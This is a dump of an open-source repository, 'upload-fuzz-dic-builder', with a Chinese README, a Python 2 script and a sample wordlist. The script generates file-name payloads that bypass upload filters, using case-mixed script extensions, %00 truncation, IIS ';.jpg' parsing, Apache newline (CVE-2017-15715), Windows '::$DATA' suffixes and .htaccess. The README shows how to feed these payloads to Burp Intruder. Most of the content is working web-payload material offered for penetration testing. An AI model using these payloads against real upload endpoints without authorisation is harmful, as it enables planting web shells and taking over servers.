├── .gitignore ├── LICENSE ├── README.md ├── dic ├── all_upload_fuzz.txt ├── apache_upload_fuzz.txt ├── asp_upload_fuzz.txt ├── iis_upload_fuzz.txt ├── jsp_upload_fuzz.txt ├── linux_upload_fuzz.txt ├── php_upload_fuzz.txt ├── tomcat_upload_fuzz.txt └── win_upload_fuzz.txt ├── doc ├── burp_intruder_setting.png └── upload_fuzz_dic.png └── upload-fuzz-dic-builder.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 残亦 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # upload-fuzz-dic-builder 上传漏洞fuzz字典生成脚本 2 | 3 | ![生成的字典](doc/upload_fuzz_dic.png) 4 | 5 | ## 一、uasg 6 | 7 | ``` 8 | $ python upload-fuzz-dic-builder.py -h 9 | usage: upload-fuzz-dic-builder [-h] [-n] [-a] [-l] [-m] [--os] [-d] [-o] 10 | 11 | optional arguments: 12 | -h, --help show this help message and exit 13 | -n , --upload-filename 14 | Upload file name 15 | -a , --allow-suffix Allowable upload suffix 16 | -l , --language Uploaded script language 17 | -m , --middleware Middleware used in Web System 18 | --os Target operating system type 19 | -d, --double-suffix Is it possible to generate double suffix? 20 | -o , --output Output file 21 | ``` 22 | 23 | ### 1.1 Example1 24 | 生成适合全语言,全部中间件,全部操作系统的fuzz字典 25 | 26 | ``` 27 | python upload-fuzz-dic-builder.py 28 | ``` 29 | 30 | ### 1.2 Example2 31 | 生成适合后端语言为`asp`的fuzz字典 32 | 33 | ``` 34 | python upload-fuzz-dic-builder.py -l asp 35 | ``` 36 | 37 | ### 1.3 Example3 38 | 上传文件名为:`test`,可以上传后缀为`jpg`,后端语言为`php`,中间件为`apache`,操作系统为`Windows`,输出字典名为`upload_filename.txt`的fuzz字典 39 | 40 | ``` 41 | python upload-fuzz-dic-builder.py -n test -a jpg -l php -m apache --os win -o upload_file.txt 42 | ``` 43 | 44 | 45 | ### 1.4 注意: 46 | 47 | 1. 生成时给的上传点相关信息越详细,生成的字典越精确! 48 | 2. 在使用burp的Intruder模块进行fuzz时将Payload面板中`Payload Encoding`一栏的`URL-encode these characters`选项设置为未选中状态。 49 | 50 | ![burp intruder模块设置](doc/burp_intruder_setting.png) 51 | 52 | ## 二、more 53 | 54 | [构造优质上传漏洞fuzz字典](http://gv7.me/articles/2018/make-upload-vul-fuzz-dic/) -------------------------------------------------------------------------------- /dic/all_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/all_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/apache_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/apache_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/asp_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/asp_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/iis_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/iis_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/jsp_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/jsp_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/linux_upload_fuzz.txt: -------------------------------------------------------------------------------- 1 | test.php3%00.jpg 2 | test.jspf/ 3 | test.aSp%00.jpg 4 | test.cEr.jpg 5 | test.jSpf%00.jpg 6 | test.Html 7 | 8 | test.htm%00.jpg 9 | test.ascx 10 | 11 | test.pHp.xxx 12 | test.jSpx.jpg 13 | test.cEr;.jpg 14 | test.Html 15 | test.aShx 16 | test.asa;.jpg 17 | test.pHp5 18 | 19 | test.aspx;.jpg 20 | test.asp.jpg 21 | test.pHp4 22 | 23 | test.php4/ 24 | test.pHp2.xxx 25 | test.asa%00.jpg 26 | test.cer.xxx 27 | test.ascx;.jpg 28 | test.php5;.jpg 29 | test.aSp 30 | 31 | test.php3%20 32 | test.htm.jpg 33 | test.aSmx.xxx 34 | test.php::$DATA 35 | test.pHp5.xxx 36 | test.php3.xxx 37 | test.aSp.jpg 38 | test.pHp2;.jpg 39 | test.asa.jpg 40 | test.php4 41 | 42 | test.aspx 43 | test.ashx.xxx 44 | test.aShx 45 | 46 | test.phtml%00.jpg 47 | test.cer%00.jpg 48 | test.jspa/ 49 | test.php5::$DATA 50 | test.aScx.jpg 51 | test.jsw::$DATA 52 | test.jspf%20 53 | test.php.xxx 54 | test.asp 55 | 56 | test.jSpa::$DATA 57 | test.jsw%20 58 | test.aSa%00.jpg 59 | test.aSmx%00.jpg 60 | test.cer 61 | test.pHtml 62 | 63 | test.asp%00.jpg 64 | test.pHp5%20 65 | test.aSpx 66 | test.php5/ 67 | test.php4;.jpg 68 | test.pHp3%00.jpg 69 | test.jsv%00.jpg 70 | test.pHp3/ 71 | test.asax.xxx 72 | test.jSpa.jpg 73 | test.cEr 74 | 75 | test.jSv::$DATA 76 | test.pHp2%20 77 | test.cer.jpg 78 | test.jSw%20 79 | test.jSv 80 | test.jSw 81 | test.jSp 82 | test.Htm 83 | 84 | test.php2%00.jpg 85 | test.php5 86 | 87 | test.jSw%00.jpg 88 | test.cEr.xxx 89 | test.jSw::$DATA 90 | test.php4.xxx 91 | test.aSa.xxx 92 | test.php2.xxx 93 | test.jspx.jpg 94 | test.jsw%00.jpg 95 | test.aScx 96 | 97 | test.htm 98 | test.php.jpg 99 | test.cer 100 | 101 | test.aSpx.xxx 102 | test.php2%20 103 | test.aSa.jpg 104 | test.jsp::$DATA 105 | test.pHp4%20 106 | test.aShx.jpg 107 | test.aSpx.jpg 108 | test.pht 109 | 110 | test.php3.jpg 111 | test.aSa 112 | 113 | test.pHtml 114 | test.jSpf/ 115 | test.jHtml 116 | test.aspx 117 | 118 | test.pHp5::$DATA 119 | test.php%20 120 | test.aShx.xxx 121 | test.jSpa%20 122 | test.cer;.jpg 123 | test.jtml 124 | test.jspx%00.jpg 125 | test.aspx.jpg 126 | test.aSa;.jpg 127 | test.jsw.jpg 128 | test.aSpx;.jpg 129 | test.jSv.jpg 130 | test.asa 131 | 132 | test.ascx.xxx 133 | test.jSp%20 134 | test.asmx 135 | 136 | test.asp 137 | test.jHtml%00.jpg 138 | test.jspx::$DATA 139 | test.jspf%00.jpg 140 | test.aSax.jpg 141 | test.pHp2::$DATA 142 | test.jSp.jpg 143 | test.asax 144 | test.Htm.xxx 145 | test.asa 146 | test.php5.xxx 147 | test.phtml.xxx 148 | test.jHtml::$DATA 149 | test.Html%00.jpg 150 | test.jspx/ 151 | test.ashx 152 | 153 | test.asa.xxx 154 | test.ashx;.jpg 155 | test.jHtml/ 156 | test.jSp::$DATA 157 | test.asax;.jpg 158 | test.jSpa/ 159 | test.jSpx::$DATA 160 | test.ascx.jpg 161 | test.html 162 | 163 | test.Htm%00.jpg 164 | test.php2::$DATA 165 | test.jsp.jpg 166 | test.aSax 167 | test.ashx 168 | test.cEr 169 | test.aShx%00.jpg 170 | test.php5%20 171 | test.aspx%00.jpg 172 | test.jsv.jpg 173 | test.htm 174 | 175 | test.aSmx;.jpg 176 | test.jsp%20 177 | test.pHp4.jpg 178 | test.jspf.jpg 179 | test.aSax;.jpg 180 | test.cEr%00.jpg 181 | test.aSpx 182 | 183 | test.Html.xxx 184 | test.jSp/ 185 | test.html.jpg 186 | test.jHtml%20 187 | test.php4::$DATA 188 | test.jSw.jpg 189 | test.jSpf%20 190 | test.asax.jpg 191 | test.pHp;.jpg 192 | test.jspa%00.jpg 193 | test.Html.jpg 194 | test.php%00.jpg 195 | test.php5.jpg 196 | test.pHp2%00.jpg 197 | test.jspa 198 | test.jtml%00.jpg 199 | test.aSmx 200 | 201 | test.php3/ 202 | test.pHp3::$DATA 203 | test.php3::$DATA 204 | test.jspf 205 | test.html.xxx 206 | test.asax 207 | 208 | test.jspa::$DATA 209 | test.aSax%00.jpg 210 | test.jSv/ 211 | test.php4%20 212 | test.pHp%20 213 | test.php;.jpg 214 | test.jspx 215 | test.pHp 216 | test.jHtml.jpg 217 | test.jSpx%00.jpg 218 | test.asp.xxx 219 | test.jSpa 220 | test.pHp2 221 | 222 | test.phtml 223 | test.ascx 224 | test.aScx;.jpg 225 | test.jSpf 226 | test.asmx.jpg 227 | test.jspa.jpg 228 | test.ascx%00.jpg 229 | test.asp;.jpg 230 | test.pHtml.xxx 231 | test.htm.xxx 232 | test.jSv%00.jpg 233 | test.pHp3;.jpg 234 | test.ashx.jpg 235 | test.php5%00.jpg 236 | test.pHtml%00.jpg 237 | test.jSpx 238 | test.jsw/ 239 | test.jtml.jpg 240 | test.aScx.xxx 241 | test.asax%00.jpg 242 | test.aSp 243 | test.pHp2/ 244 | test.aScx 245 | test.jsv%20 246 | test.pht.xxx 247 | test.php2.jpg 248 | test.Htm 249 | test.jsp/ 250 | test.pHp3%20 251 | test.php4%00.jpg 252 | test.aSa 253 | test.php3;.jpg 254 | test.jtml/ 255 | test.jspx%20 256 | test.jSpx/ 257 | test.pHp5%00.jpg 258 | test.ashx%00.jpg 259 | test.aShx;.jpg 260 | test.aScx%00.jpg 261 | test.pHp/ 262 | test.php2/ 263 | test.jSv%20 264 | test.pHp5;.jpg 265 | test.jspa%20 266 | test.aSax 267 | 268 | test.pht%00.jpg 269 | test.jsv/ 270 | test.pHp::$DATA 271 | test.pht.jpg 272 | test.pHp3.xxx 273 | test.phtml 274 | 275 | test.pHp4 276 | test.pHp5 277 | test.jSpx%20 278 | test.phtml.jpg 279 | test.jsp%00.jpg 280 | test.pHp2 281 | test.pHp3 282 | test.php2 283 | 284 | test.aspx.xxx 285 | test.php/ 286 | test.pHp 287 | 288 | test.pHp4::$DATA 289 | test.asmx 290 | test.jspf::$DATA 291 | test.aSpx%00.jpg 292 | test.asmx.xxx 293 | test.pHp5.jpg 294 | test.html 295 | test.asmx%00.jpg 296 | test.pHp3 297 | 298 | test.php 299 | 300 | test.pHp.jpg 301 | test.php4 302 | test.php5 303 | test.php2;.jpg 304 | test.pHtml.jpg 305 | test.jtml%20 306 | test.php2 307 | test.php3 308 | test.jtml::$DATA 309 | test.jSp%00.jpg 310 | test.pHp4;.jpg 311 | test.php4.jpg 312 | test.aSmx 313 | test.jsv::$DATA 314 | test.aSmx.jpg 315 | test.jsv 316 | test.jsw 317 | test.jsp 318 | test.jSpf::$DATA 319 | test.aSax.xxx 320 | test.php 321 | test.pHp3.jpg 322 | test.pHp4.xxx 323 | test.pht 324 | test.asmx;.jpg 325 | test.Htm.jpg 326 | test.jSpf.jpg 327 | test.pHp4%00.jpg 328 | test.pHp2.jpg 329 | test.pHp%00.jpg 330 | test.aSp;.jpg 331 | test.jSpa%00.jpg 332 | test.php3 333 | 334 | test.jSw/ 335 | test.html%00.jpg 336 | test.pHp5/ 337 | test.pHp4/ 338 | test.aSp.xxx 339 | .htaccess 340 | -------------------------------------------------------------------------------- /dic/php_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/php_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/tomcat_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/tomcat_upload_fuzz.txt -------------------------------------------------------------------------------- /dic/win_upload_fuzz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/dic/win_upload_fuzz.txt -------------------------------------------------------------------------------- /doc/burp_intruder_setting.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/doc/burp_intruder_setting.png -------------------------------------------------------------------------------- /doc/upload_fuzz_dic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/c0ny1/upload-fuzz-dic-builder/4c0f79e86efe1c77747b52912541eb47d7864637/doc/upload_fuzz_dic.png -------------------------------------------------------------------------------- /upload-fuzz-dic-builder.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | author: c0ny1 4 | github: https://github.com/c0ny1/upload-fuzz-dic-builder 5 | date: 2018-11-04 23:16 6 | description: 生成符合漏洞实际场景fuzz字典的脚本 7 | ''' 8 | 9 | import argparse 10 | import copy 11 | import urllib 12 | 13 | ## 各类语言可解析的后缀 14 | html_parse_suffix = ['html','htm','phtml','pht','Html','Htm','pHtml'] 15 | asp_parse_suffix = ['asp','aspx','asa','asax','ascx','ashx','asmx','cer','aSp','aSpx','aSa','aSax','aScx','aShx','aSmx','cEr'] 16 | php_parse_suffix = ['php','php5','php4','php3','php2','pHp','pHp5','pHp4','pHp3','pHp2'] 17 | jsp_parse_suffix = ['jsp','jspa','jspx','jsw','jsv','jspf','jtml','jSp','jSpx','jSpa','jSw','jSv','jSpf','jHtml'] 18 | 19 | 20 | ## web中间件解析漏洞 21 | def iis_suffix_creater(suffix): 22 | res = [] 23 | for l in suffix: 24 | str ='%s;.%s' % (l,allow_suffix) 25 | res.append(str) 26 | return res 27 | 28 | def apache_suffix_creater(suffix): 29 | res = [] 30 | for l in suffix: 31 | str = '%s.xxx' % l 32 | res.append(str) 33 | str = '%s%s' % (l,urllib.unquote('%0a')) #CVE-2017-15715 34 | res.append(str) 35 | return res 36 | 37 | win_tomcat = ['%20','::$DATA','/'] 38 | def tomcat_suffix_creater(suffix): 39 | res = [] 40 | for l in suffix: 41 | for t in win_tomcat: 42 | str = '%s%s' % (l,t) 43 | res.append(str) 44 | return res 45 | 46 | ## 系统特性 47 | def str_81_to_ff(): 48 | res = [] 49 | for i in range(129,256): 50 | str = '%x' % i 51 | str = '%' + str 52 | str = urllib.unquote(str) 53 | res.append(str) 54 | return res 55 | 56 | windows_os = [' ','.','/','::$DATA','<','>','>>>','%20','%00'] + str_81_to_ff() 57 | 58 | def windows_suffix_creater(suffix): 59 | res = [] 60 | for s in suffix: 61 | for w in windows_os: 62 | str = '%s%s' % (s,w) 63 | res.append(str) 64 | return res 65 | 66 | ## 脚本语言漏洞(00截断) 67 | def str_00_truncation(suffix,allow_suffix): 68 | res = [] 69 | for i in suffix: 70 | str = '%s%s.%s' % (i,'%00',allow_suffix) 71 | res.append(str) 72 | str = '%s%s.%s' % (i,urllib.unquote('%00'),allow_suffix) 73 | res.append(str) 74 | return res 75 | 76 | ## 返回字符串所有大写可能 77 | def str_case_mixing(word): 78 | str_list = [] 79 | word = word.lower() 80 | tempWord = copy.deepcopy(word) 81 | plist = [] 82 | redict = {} 83 | for char in range( len( tempWord ) ): 84 | char = word[char] 85 | plist.append(char) 86 | num = len( plist ) 87 | for i in range( num ): 88 | for j in range( i , num + 1 ): 89 | sContent = ''.join( plist[0:i] ) 90 | mContent = ''.join( plist[i:j] ) 91 | mContent = mContent.upper() 92 | eContent = ''.join( plist[j:] ) 93 | content = '''%s%s%s''' % (sContent,mContent,eContent) 94 | redict[content] = None 95 | 96 | for i in redict.keys(): 97 | str_list.append(i) 98 | 99 | return str_list 100 | 101 | ## list大小写混合 102 | def list_case_mixing(li): 103 | res = [] 104 | for l in li: 105 | res += str_case_mixing(l) 106 | return res 107 | 108 | ## 双后缀生成 109 | def str_double_suffix_creater(suffix): 110 | res = [] 111 | for i in range(1,len(suffix)): 112 | str = list(suffix) 113 | str.insert(i,suffix) 114 | res.append("".join(str)) 115 | return res 116 | 117 | def list_double_suffix_creater(list_suffix): 118 | res = [] 119 | for l in list_suffix: 120 | res += str_double_suffix_creater(l) 121 | return duplicate_removal(res) 122 | 123 | #list 去重 124 | def duplicate_removal(li): 125 | return list(set(li)) 126 | 127 | #list 去空行 128 | def clear_list(li): 129 | rmstr = ['',' ',None] 130 | for l in li: 131 | for r in rmstr: 132 | if l == r: 133 | li.remove(r) 134 | return li 135 | 136 | def parse_args(): 137 | parser = argparse.ArgumentParser(prog='upload-fuzz-dic-builder', 138 | formatter_class=argparse.RawTextHelpFormatter, 139 | description='') 140 | 141 | parser.add_argument('-n','--upload-filename',metavar='',dest='upload_file_name', type=str, default='test', 142 | help=u'Upload file name') 143 | 144 | parser.add_argument('-a','--allow-suffix',metavar='',dest='allow_suffix', type=str, default='jpg', 145 | help=u'Allowable upload suffix') 146 | 147 | parser.add_argument('-l','--language',metavar='',dest='language',choices=['asp','php','jsp','all'], type=str, default='all', 148 | help='Uploaded script language') 149 | 150 | parser.add_argument('-m','--middleware',metavar='',dest='middleware',choices=['iis','apache','tomcat','all'],type=str, default='all', 151 | help='Middleware used in Web System') 152 | parser.add_argument('--os',metavar='',dest='os', choices=['win','linux','all'],type=str, default='all', 153 | help='Target operating system type') 154 | 155 | parser.add_argument('-d','--double-suffix',dest='double_suffix', default=False,action='store_true', 156 | help='Is it possible to generate double suffix?') 157 | parser.add_argument('-o','--output',metavar='',dest='output_filename', type=str, default='upload_fuzz_dic.txt', 158 | help='Output file') 159 | 160 | args = parser.parse_args() 161 | return args 162 | 163 | if __name__ == '__main__': 164 | 165 | args = parse_args() 166 | upload_file_name = args.upload_file_name 167 | allow_suffix = args.allow_suffix 168 | output_filename =args.output_filename 169 | 170 | language = args.language 171 | middleware = args.middleware 172 | os = args.os 173 | double_suffix =args.double_suffix 174 | 175 | if middleware == 'iis': 176 | os = 'win' 177 | 178 | ################################### 179 | 180 | f = open(output_filename,'w') 181 | parse_suffix = [] 182 | case_parse_suffix = [] 183 | middleware_parse_suffix = [] 184 | htaccess_suffix = [] 185 | os_parse_suffix = [] 186 | double_parse_suffix = [] 187 | 188 | 189 | # 可解析后缀 190 | if language == 'asp': 191 | html_parse_suffix = [] 192 | php_parse_suffix = [] 193 | jsp_parse_suffix = [] 194 | parse_suffix = asp_parse_suffix 195 | elif language == 'php': 196 | asp_parse_suffix = [] 197 | jsp_parse_suffix = [] 198 | parse_suffix = html_parse_suffix + php_parse_suffix 199 | elif language == 'jsp': 200 | html_parse_suffix = [] 201 | asp_parse_suffix = [] 202 | php_parse_suffix = [] 203 | parse_suffix = jsp_parse_suffix 204 | else: # language == 'all' 205 | parse_suffix = html_parse_suffix + asp_parse_suffix + php_parse_suffix + jsp_parse_suffix 206 | print u'[+] 收集%d条可解析后缀完毕!' % len(parse_suffix) 207 | 208 | # 可解析后缀 + 大小写混合 209 | if os == 'win' or os == 'all': 210 | case_html_parse_suffix = list_case_mixing(html_parse_suffix) 211 | case_asp_parse_suffix = list_case_mixing(asp_parse_suffix) 212 | case_php_parse_suffix = list_case_mixing(php_parse_suffix) 213 | case_jsp_parse_suffix = list_case_mixing(jsp_parse_suffix) 214 | case_parse_suffix = list_case_mixing(parse_suffix) 215 | print u'[+] 加入%d条可解析后缀大小写混合完毕!' % len(case_parse_suffix) 216 | else: # os == 'linux' 217 | case_html_parse_suffix = html_parse_suffix 218 | case_asp_parse_suffix = asp_parse_suffix 219 | case_php_parse_suffix = php_parse_suffix 220 | case_jsp_parse_suffix = jsp_parse_suffix 221 | case_parse_suffix = parse_suffix 222 | 223 | # 中间件漏洞 224 | if middleware == 'iis': 225 | case_asp_php_jsp_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_jsp_parse_suffix 226 | middleware_parse_suffix = iis_suffix_creater(case_asp_php_jsp_parse_suffix) 227 | elif middleware == 'apache': 228 | case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix 229 | middleware_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix) 230 | elif middleware == 'tomcat' and os == 'linux': 231 | middleware_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix 232 | elif middleware == 'tomcat' and (os == 'win' or os == 'all'): 233 | case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix 234 | middleware_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix) 235 | else: 236 | case_asp_php_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix 237 | iis_parse_suffix = iis_suffix_creater(case_asp_php_parse_suffix) 238 | case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix 239 | apache_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix) 240 | case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix 241 | tomcat_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix) 242 | middleware_parse_suffix = iis_parse_suffix + apache_parse_suffix + tomcat_parse_suffix 243 | 244 | middleware_parse_suffix = duplicate_removal(middleware_parse_suffix) 245 | print u'[+] 加入%d条中间件漏洞完毕!' % len(middleware_parse_suffix) 246 | 247 | # .htaccess 248 | if (middleware == 'apache' or middleware == 'all') and (os == 'win' or os == 'all'): 249 | htaccess_suffix = str_case_mixing(".htaccess") 250 | print u'[+] 加入%d条.htaccess完毕!' % len(htaccess_suffix) 251 | elif (middleware == 'apache' or middleware == 'all') and os == 'linux': 252 | htaccess_suffix = ['.htaccess'] 253 | print u'[+] 加入1条.htaccess' 254 | else: 255 | htaccess_suffix = [] 256 | 257 | # 系统特性 258 | if os == 'win': 259 | os_parse_suffix = windows_suffix_creater(case_parse_suffix) 260 | elif os == 'linux': 261 | os_parse_suffix = parse_suffix 262 | else: 263 | win_suffix = windows_suffix_creater(case_parse_suffix) 264 | linux_suffix = parse_suffix 265 | os_parse_suffix = win_suffix + linux_suffix 266 | 267 | os_parse_suffix = duplicate_removal(os_parse_suffix) 268 | print u'[+] 加入%d条系统特性完毕!' % len(os_parse_suffix) 269 | 270 | # 语言漏洞 271 | 272 | language_parse_suffux = str_00_truncation(case_parse_suffix,allow_suffix) 273 | 274 | # 双后缀 + 大小写混合 275 | if double_suffix: 276 | double_parse_suffix = list_double_suffix_creater(case_parse_suffix) 277 | print u'[+] 加入%d条双后缀完毕!' % len(double_parse_suffix) 278 | else: 279 | double_parse_suffix = [] 280 | 281 | all_parse_suffix = case_parse_suffix + middleware_parse_suffix + os_parse_suffix + language_parse_suffux + double_parse_suffix 282 | all_parse_suffix = duplicate_removal(all_parse_suffix) 283 | all_parse_suffix = clear_list(all_parse_suffix) 284 | # 写文件 285 | num = len(all_parse_suffix) 286 | for i in all_parse_suffix: 287 | str = '%s.%s' % (upload_file_name,i) 288 | #print '[+] '+type(str) 289 | f.write(str) 290 | f.write('\n') 291 | num += len(htaccess_suffix) 292 | for i in htaccess_suffix: 293 | f.write(i) 294 | f.write('\n') 295 | f.close() 296 | print u'[+] 去重后共%s条数据写入%s文件' % (num,output_filename) 297 | --------------------------------------------------------------------------------